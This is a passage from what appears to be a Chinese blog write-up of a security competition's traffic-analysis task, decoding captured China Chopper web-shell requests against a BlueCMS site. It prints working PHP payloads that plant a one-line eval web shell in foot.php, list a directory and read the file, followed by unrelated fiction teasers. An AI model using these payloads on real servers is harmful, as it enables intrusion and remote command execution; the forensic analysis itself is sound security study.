--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// 將 <?php eval($_POST['cmd_shell']);?> 寫入 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// 獲取目標(biāo)服務(wù)器 C:\\phpstudy\\WWW\\bluecms\\data\\ 目錄的所有文件

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// 獲取 C:\\phpstudy\\WWW\\bluecms\\data\\foot.php 文件內(nèi)容
->|<?php eval($_POST['cmd_shell']);?>|<

也可以根據(jù)菜刀用于分隔自己的命令和程序本身輸出的 HTML 的分隔符 , 例如 : ->|

到這里基本上也就分析差不多了

最后編輯于：2018.03.12 11:25:19

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者

人面猴
序言：七十年代末，一起剝皮案震驚了整個濱河市，隨后出現(xiàn)的幾起案子旬痹，更是在濱河造成了極大的恐慌淑际，老刑警劉巖奔穿，帶你破解...
沈念sama閱讀 206,311評論 6贊 481
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件闻鉴，死亡現(xiàn)場離奇詭異磷瘤，居然都是意外死亡芒篷，警方通過查閱死者的電腦和手機(jī)，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 88,339評論 2贊 382
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門采缚，熙熙樓的掌柜王于貴愁眉苦臉地迎上來针炉，“玉大人，你說我怎么就攤上這事扳抽〈叟粒” “怎么了殖侵？”我有些...
開封第一講書人閱讀 152,671評論 0贊 342
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長镰烧。經(jīng)常有香客問我拢军，道長，這世上最難降的妖魔是什么怔鳖？我笑而不...
開封第一講書人閱讀 55,252評論 1贊 279
?港島之戀（遺憾婚禮）
正文為了忘掉前任茉唉，我火速辦了婚禮，結(jié)果婚禮上败砂，老公的妹妹穿的比我還像新娘赌渣。我一直安慰自己，他們只是感情好昌犹，可當(dāng)我...
茶點(diǎn)故事閱讀 64,253評論 5贊 371
惡毒庶女頂嫁案：這布局不是一般人想出來的
文/花漫我一把揭開白布。她就那樣靜靜地躺著览芳，像睡著了一般斜姥。火紅的嫁衣襯著肌膚如雪。梳的紋絲不亂的頭發(fā)上沧竟，一...
開封第一講書人閱讀 49,031評論 1贊 285
城市分裂傳說
那天铸敏，我揣著相機(jī)與錄音，去河邊找鬼悟泵。笑死杈笔，一個胖子當(dāng)著我的面吹牛，可吹牛的內(nèi)容都是我干的糕非。我是一名探鬼主播蒙具，決...
沈念sama閱讀 38,340評論 3贊 399
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開眼，長吁一口氣：“原來是場噩夢啊……” “哼朽肥！你這毒婦竟也來了禁筏？” 一聲冷哼從身側(cè)響起，我...
開封第一講書人閱讀 36,973評論 0贊 259
萬榮殺人案實(shí)錄
序言：老撾萬榮一對情侶失蹤衡招，失蹤者是張志新（化名）和其女友劉穎篱昔，沒想到半個月后，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體始腾，經(jīng)...
沈念sama閱讀 43,466評論 1贊 300
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡州刽，尸身上長有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 35,937評論 2贊 323
?白月光啟示錄
正文我和宋清朗相戀三年，在試婚紗的時候發(fā)現(xiàn)自己被綠了浪箭。大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片穗椅。...
茶點(diǎn)故事閱讀 38,039評論 1贊 333
活死人
序言：一個原本活蹦亂跳的男人離奇死亡，死狀恐怖山林，靈堂內(nèi)的尸體忽然破棺而出房待，到底是詐尸還是另有隱情邢羔，我是刑警寧澤，帶...
沈念sama閱讀 33,701評論 4贊 323
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布桑孩，位于F島的核電站拜鹤，受9級特大地震影響，放射性物質(zhì)發(fā)生泄漏流椒。R本人自食惡果不足惜敏簿，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 39,254評論 3贊 307
男人毒藥：我在死后第九天來索命
文/蒙蒙一、第九天我趴在偏房一處隱蔽的房頂上張望宣虾。院中可真熱鬧惯裕，春花似錦、人聲如沸绣硝。這莊子的主人今日做“春日...
開封第一講書人閱讀 30,259評論 0贊 19
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽鹉胖。三九已至握玛，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間甫菠，已是汗流浹背挠铲。一陣腳步聲響...
開封第一講書人閱讀 31,485評論 1贊 262
情欲美人皮
我被黑心中介騙來泰國打工，沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留寂诱，地道東北人拂苹。一個月前我還...
沈念sama閱讀 45,497評論 2贊 354
代替公主和親
正文我出身青樓，卻偏偏與公主長得像痰洒，于是被迫代替她去往敵國和親瓢棒。傳聞我的和親對象是個殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 42,786評論 2贊 345

[信息安全鐵人三項(xiàng)賽總決賽](數(shù)據(jù)賽)第二題

WriteUps

推薦閱讀更多精彩內(nèi)容